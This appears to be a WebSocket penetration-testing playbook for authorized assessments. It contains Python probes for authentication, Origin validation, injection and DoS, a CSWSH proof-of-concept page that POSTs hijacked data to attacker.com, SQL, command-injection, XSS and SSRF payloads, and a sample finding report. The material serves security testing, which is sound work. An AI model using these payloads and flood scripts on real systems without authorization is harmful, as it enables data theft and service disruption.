Tests WebSocket API implementations for security vulnerabilities including missing authentication on WebSocket upgrade, Cross-Site WebSocket Hijacking (CSWSH), injection attacks through WebSocket messages, insufficient input validation, denial-of-service via message flooding, and information leakage through WebSocket frames. The tester intercepts WebSocket handshakes and messages using Burp Suite, crafts malicious payloads, and tests for authorization bypass on WebSocket channels. Activates for requests involving WebSocket security testing, WS penetration testing, CSWSH attack, or real-time API security assessment.
Do not use without written authorization. WebSocket testing may disrupt real-time services and affect other connected users.
Prerequisites: the Python websockets and asyncio libraries, and wscat (npm install -g wscat).
import asyncio
import websockets
import json
import ssl
import time
# Placeholder WebSocket endpoint that every test below connects to.
WS_URL = "wss://target-api.example.com/ws"
# Placeholder credential; sent verbatim as the Authorization header value
# (and as the ?token= query value in the URL-token test).
AUTH_TOKEN = "Bearer <token>"
# Capture and analyze the WebSocket handshake
async def analyze_handshake():
    """Connect to WS_URL with the Authorization header and report the handshake.

    Prints the negotiated subprotocol and extensions, sends a JSON
    ``{"type": "ping"}`` probe and prints the first reply.

    Returns:
        True if the WebSocket handshake completed (even when the server does
        not answer the probe within 5 seconds); False if the upgrade was
        rejected or the connection failed for any other reason.
    """
    try:
        async with websockets.connect(
            WS_URL,
            extra_headers={"Authorization": AUTH_TOKEN},
            ssl=ssl.create_default_context(),
        ) as ws:
            print(f"Connected to: {WS_URL}")
            print(f"Protocol: {ws.subprotocol}")
            print(f"Extensions: {ws.extensions}")

            # Send a test message
            await ws.send(json.dumps({"type": "ping"}))
            try:
                response = await asyncio.wait_for(ws.recv(), timeout=5)
            except asyncio.TimeoutError:
                # A silent server is not a failed handshake. Handling the
                # timeout here also avoids the generic handler printing an
                # empty message, because str(TimeoutError()) is ''.
                print("Server response: <none within 5s>")
            else:
                print(f"Server response: {response}")
            return True
    except websockets.exceptions.InvalidStatusCode as e:
        # The server answered the upgrade request with a non-101 status.
        print(f"Connection rejected: {e.status_code}")
        return False
    except Exception as e:
        # Fall back to the exception type when the message is empty.
        print(f"Connection error: {str(e) or type(e).__name__}")
        return False
# Module-level call: runs the handshake check (live network I/O against WS_URL).
asyncio.run(analyze_handshake())
async def _send_and_receive(url, message, headers=None):
    """Open *url*, send *message* as JSON and return the first reply.

    Propagates whatever ``websockets.connect`` raises on a failed handshake
    and ``asyncio.TimeoutError`` when no reply arrives within 5 seconds.
    """
    async with websockets.connect(url, extra_headers=headers) as ws:
        await ws.send(json.dumps(message))
        return await asyncio.wait_for(ws.recv(), timeout=5)


async def test_ws_authentication():
    """Test if WebSocket requires authentication.

    Runs four probes against WS_URL: no credentials, an invalid token, an
    expired token, and the token passed as a ``?token=`` query parameter.

    Returns:
        A list of dicts, one per probe, each with a "test" name and a
        "status" string ("VULNERABLE", "SECURE", "ERROR: ...", "REJECTED" or
        an "INFO - ..." note). Vulnerable header probes also carry the first
        200 characters of the reply under "response".
    """
    from urllib.parse import quote

    results = []
    expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"

    # Tests 1-3 differ only in the Authorization header they present.
    header_probes = [
        ("No authentication", None),
        ("Invalid token", {"Authorization": "Bearer invalid_token"}),
        ("Expired token", {"Authorization": expired_token}),
    ]
    for test_name, headers in header_probes:
        try:
            resp = await _send_and_receive(
                WS_URL, {"type": "get_user_data"}, headers
            )
        except websockets.exceptions.InvalidStatusCode:
            # Only an explicit handshake rejection counts as SECURE.
            results.append({"test": test_name, "status": "SECURE"})
        except Exception as e:
            # Network failures and timeouts are inconclusive, not SECURE.
            # Fall back to the exception type because some exceptions
            # (e.g. TimeoutError) have an empty message.
            detail = str(e) or type(e).__name__
            results.append({"test": test_name, "status": f"ERROR: {detail}"})
        else:
            results.append({
                "test": test_name,
                "status": "VULNERABLE",
                "response": resp[:200],
            })
            if headers is None:
                print("[VULN] WebSocket accessible without authentication")

    # Test 4: Token in query parameter (leakage risk)
    # The token contains characters that are not valid in a URL (a space in
    # "Bearer <token>"), so it must be percent-encoded.
    separator = "&" if "?" in WS_URL else "?"
    token_url = f"{WS_URL}{separator}token={quote(AUTH_TOKEN, safe='')}"
    try:
        await _send_and_receive(token_url, {"type": "ping"})
    except Exception:
        results.append({"test": "Token in URL", "status": "REJECTED"})
    else:
        results.append({
            "test": "Token in URL",
            "status": "INFO - Token accepted in query parameter (may leak in logs)",
        })

    for r in results:
        # The status is truncated to 10 characters to keep the tag column narrow.
        print(f" [{r['status'][:10]}] {r['test']}")
    return results
# Module-level call: runs the authentication probes (live network I/O against WS_URL).
asyncio.run(test_ws_authentication())
async def test_cswsh():
    """Test for Cross-Site WebSocket Hijacking vulnerability.

    Connects to WS_URL once per candidate Origin value (always presenting
    AUTH_TOKEN), requests "get_messages" and prints one line per origin:
    [CSWSH] when a non-legitimate origin is accepted, [OK] when the
    legitimate or absent origin is accepted, [BLOCKED] when the handshake is
    rejected, and [ERROR] for any other failure.
    """
    # CSWSH occurs when the WebSocket server does not validate the Origin header
    # An attacker's website can connect to the legitimate WebSocket and steal data
    legitimate_origin = "https://target-api.example.com"
    origins_to_test = [
        None,  # No Origin header
        "https://evil.com",  # Attacker domain
        "https://target-api.example.com.evil.com",  # Subdomain confusion
        "null",  # Null origin (sandboxed iframe)
        legitimate_origin,  # Legitimate origin
        "http://target-api.example.com",  # HTTP downgrade
    ]

    print("=== CSWSH Testing ===\n")

    for origin in origins_to_test:
        headers = {"Authorization": AUTH_TOKEN}
        if origin:
            headers["Origin"] = origin
        try:
            async with websockets.connect(WS_URL, extra_headers=headers) as ws:
                # Try to receive data that should be restricted
                await ws.send(json.dumps({"type": "get_messages"}))
                try:
                    await asyncio.wait_for(ws.recv(), timeout=5)
                    outcome = "data received"
                except asyncio.TimeoutError:
                    # The handshake was still accepted for this origin, so do
                    # not let a silent server hide that behind a blank
                    # "[ERROR]" line.
                    outcome = "handshake accepted, no data within 5s"

                if origin and origin != legitimate_origin:
                    print(f"[CSWSH] Origin '{origin}' -> ACCEPTED ({outcome})")
                else:
                    print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
        except websockets.exceptions.InvalidStatusCode as e:
            print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
        except Exception as e:
            print(f"[ERROR] Origin '{origin}' -> {str(e) or type(e).__name__}")
# Module-level call: runs the Origin-validation probes (live network I/O against WS_URL).
asyncio.run(test_cswsh())
# PoC HTML page for CSWSH exploitation.
# Its script opens a WebSocket to the hard-coded target URL, sends
# "get_messages" and "get_user_data" requests, and POSTs every received
# message to https://attacker.com/collect.
# NOTE(review): nothing in the visible code writes or serves this string, and
# the endpoint inside it is a literal rather than derived from WS_URL.
CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// This page, hosted on attacker.com, connects to the target WebSocket
// If the server doesn't validate Origin, the victim's browser will
// send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() {
console.log("Connected to target WebSocket");
ws.send(JSON.stringify({type: "get_messages"}));
ws.send(JSON.stringify({type: "get_user_data"}));
};
ws.onmessage = function(event) {
console.log("Stolen data:", event.data);
// Exfiltrate to attacker server
fetch("https://attacker.com/collect", {
method: "POST",
body: event.data
});
};
</script>
<p>Loading... (CSWSH attack in progress)</p>
</body>
</html>
"""
def _injection_indicators(category, resp_lower):
    """Return heuristic labels for suspicious content in a lower-cased reply.

    These are plain substring checks, so a server that merely echoes the
    payload back can trigger them; treat hits as leads to verify manually.
    """
    found = []
    if any(kw in resp_lower for kw in ("sql", "syntax", "mysql", "postgresql")):
        found.append("SQL error")
    if any(kw in resp_lower for kw in ("root:", "uid=", "etc/passwd")):
        found.append("Command output")
    if any(kw in resp_lower for kw in ("ami-id", "instance-id", "metadata")):
        found.append("SSRF data")
    # Flag XSS only for the XSS payloads, and only when their markup comes
    # back unescaped.
    if category == "xss" and any(m in resp_lower for m in ("<script", "onerror=")):
        found.append("Reflected XSS")
    return found


async def test_ws_injection():
    """Test WebSocket messages for injection vulnerabilities.

    Sends SQL, NoSQL, XSS, command-injection, SSRF and oversized payloads
    over an authenticated connection to WS_URL and prints a line for every
    reply that matches an indicator or exceeds 10000 characters. Payloads
    that get no reply within 5 seconds are skipped silently. If the server
    closes the connection, a [CRASH] line is printed, the rest of that
    category is skipped and a fresh connection is opened for the next one.
    """
    INJECTION_PAYLOADS = {
        "sql": [
            {"type": "search", "query": "' OR '1'='1"},
            {"type": "search", "query": "'; DROP TABLE messages;--"},
            {"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
        ],
        "nosql": [
            {"type": "search", "query": {"$ne": ""}},
            {"type": "get_user", "filter": {"$gt": ""}},
        ],
        "xss": [
            {"type": "send_message", "content": "<script>alert('xss')</script>"},
            {"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
            {"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
        ],
        "command": [
            {"type": "process", "file": "test; cat /etc/passwd"},
            {"type": "convert", "input": "test | id"},
        ],
        "ssrf": [
            {"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
            {"type": "webhook", "callback": "http://localhost:6379/"},
        ],
        "overflow": [
            {"type": "send_message", "content": "A" * 100000},
            {"type": "search", "query": "B" * 1000000},
        ],
    }

    headers = {"Authorization": AUTH_TOKEN}
    # The connection is managed by hand (not ``async with``) so it can be
    # replaced after the server drops it.
    ws = await websockets.connect(WS_URL, extra_headers=headers)
    try:
        for category, payloads in INJECTION_PAYLOADS.items():
            for payload in payloads:
                encoded = json.dumps(payload)
                try:
                    await ws.send(encoded)
                    resp = await asyncio.wait_for(ws.recv(), timeout=5)
                except asyncio.TimeoutError:
                    continue
                except websockets.exceptions.ConnectionClosed:
                    print(f"[CRASH] Connection closed after {category} payload")
                    # Reconnect so the remaining categories are not sent on
                    # a dead socket and misreported as crashes.
                    ws = await websockets.connect(WS_URL, extra_headers=headers)
                    break

                # Binary frames arrive as bytes; decode them so the
                # substring checks below do not raise TypeError.
                if isinstance(resp, bytes):
                    resp = resp.decode("utf-8", errors="replace")

                # Analyze response for injection indicators
                indicators = _injection_indicators(category, resp.lower())
                if indicators:
                    print(f"[{category.upper()}] {encoded[:60]} -> {indicators}")
                elif len(resp) > 10000:
                    print(f"[OVERFLOW] Large response: {len(resp)} bytes")
    finally:
        await ws.close()
# Module-level call: sends the injection payloads (live network I/O against WS_URL).
asyncio.run(test_ws_injection())
async def test_ws_dos():
    """Test WebSocket for DoS vulnerabilities.

    Runs three probes in sequence against WS_URL, each printing its own
    summary line: a 10000-message flood, increasingly large single messages
    (1 KB to 10 MB), and up to 100 simultaneous connections.
    """
    print("=== WebSocket DoS Testing ===\n")
    headers = {"Authorization": AUTH_TOKEN}

    # Test 1: Message flooding
    async def flood_test():
        async with websockets.connect(WS_URL, extra_headers=headers) as ws:
            count = 0
            # perf_counter is monotonic, unlike time.time(), so the measured
            # interval cannot go negative on a wall-clock adjustment.
            start = time.perf_counter()
            for i in range(10000):
                try:
                    await ws.send(json.dumps({"type": "ping", "id": i}))
                    count += 1
                except websockets.exceptions.ConnectionClosed:
                    break
            elapsed = time.perf_counter() - start
            # Guard against a zero interval (e.g. the first send failing
            # immediately) to avoid ZeroDivisionError.
            rate = count / elapsed if elapsed > 0 else 0.0
            print(f" Flood test: {count} messages in {elapsed:.1f}s ({rate:.0f} msg/s)")

    await flood_test()

    # Test 2: Large message
    async def large_message_test():
        sizes = [1024, 10240, 102400, 1024000, 10240000]  # 1KB to 10MB
        async with websockets.connect(
            WS_URL,
            extra_headers=headers,
            max_size=20 * 1024 * 1024,
        ) as ws:
            for size in sizes:
                try:
                    large_msg = json.dumps({"type": "data", "payload": "A" * size})
                    await ws.send(large_msg)
                    # Only whether a reply arrives matters, not its content.
                    await asyncio.wait_for(ws.recv(), timeout=5)
                    print(f" Large message ({size} bytes): Accepted")
                except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError):
                    print(f" Large message ({size} bytes): Rejected/Disconnected")
                    break

    await large_message_test()

    # Test 3: Connection exhaustion
    async def connection_exhaustion():
        connections = []
        try:
            for _ in range(100):
                try:
                    ws = await websockets.connect(WS_URL, extra_headers=headers)
                except Exception as exc:
                    # Report why the ramp-up stopped instead of failing silently.
                    reason = str(exc) or type(exc).__name__
                    print(f" Connection exhaustion: stopped early ({reason})")
                    break
                connections.append(ws)
            print(f" Connection exhaustion: {len(connections)} concurrent connections established")
        finally:
            # Always release every socket, even on cancellation, and do not
            # let one failing close() prevent the others from closing.
            await asyncio.gather(
                *(ws.close() for ws in connections),
                return_exceptions=True,
            )

    await connection_exhaustion()
# Module-level call: runs the DoS probes (live, high-volume network I/O against WS_URL).
asyncio.run(test_ws_dos())
| Term | Definition |
|---|---|
| WebSocket | Full-duplex communication protocol over a single TCP connection, established via HTTP upgrade handshake |
| CSWSH | Cross-Site WebSocket Hijacking - an attack where a malicious website initiates a WebSocket connection to a legitimate server using the victim's browser credentials |
| Origin Validation | Server-side check of the Origin header during WebSocket handshake to prevent CSWSH by rejecting connections from unauthorized domains |
| WebSocket Frame | The basic unit of data in WebSocket communication, containing opcode, masking, payload length, and payload data |
| Upgrade Handshake | HTTP request with Upgrade: websocket and Connection: Upgrade headers that establishes the WebSocket connection |
| Message Flooding | Sending a large volume of WebSocket messages to exhaust server resources (memory, CPU, bandwidth) |
wscat -c wss://target.com/ws -H "Authorization: Bearer token"
Context: A messaging application uses WebSocket for real-time chat. The WebSocket endpoint handles message delivery, typing indicators, read receipts, and user presence. Authentication is cookie-based.
Approach:
wss://chat.example.com/ws with session cookie authentication
Pitfalls:
## Finding: Cross-Site WebSocket Hijacking Enables Real-Time Data Theft
**ID**: API-WS-001
**Severity**: High (CVSS 8.1)
**Affected Endpoint**: wss://chat.example.com/ws
**Description**:
The WebSocket server does not validate the Origin header during the
handshake. An attacker can host a malicious web page that opens a
WebSocket connection to the chat server using the victim's session
cookie. All messages, typing indicators, and presence data are
forwarded to the attacker in real time.
**Proof of Concept**:
Host the CSWSH PoC page on attacker.com. When a logged-in user
visits the page, the JavaScript establishes a WebSocket connection
to the chat server. The server authenticates the connection using
the victim's cookie and delivers all real-time chat data to the
attacker's connection.
**Impact**:
Real-time interception of all private messages, presence data,
and typing indicators for any user who visits the attacker's page.
**Remediation**:
1. Validate the Origin header against an allowlist of legitimate domains
2. Implement CSRF tokens in the WebSocket handshake URL
3. Use token-based authentication (Authorization header) instead of cookies for WebSocket
4. Implement per-message authorization checks, not just connection-level authentication
5. Add rate limiting on WebSocket message volume per connection